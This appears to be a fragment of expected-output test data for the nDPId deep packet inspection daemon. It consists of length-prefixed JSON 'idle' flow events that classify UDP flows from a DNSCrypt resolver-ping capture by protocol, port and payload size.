+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312180,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312106,"flow_last_seen":946739312136,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311313,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396107,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337186,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317825,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304393,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304394,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391306,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304369,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337190,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312466,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380838,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380832,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306433,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305191,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304367,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
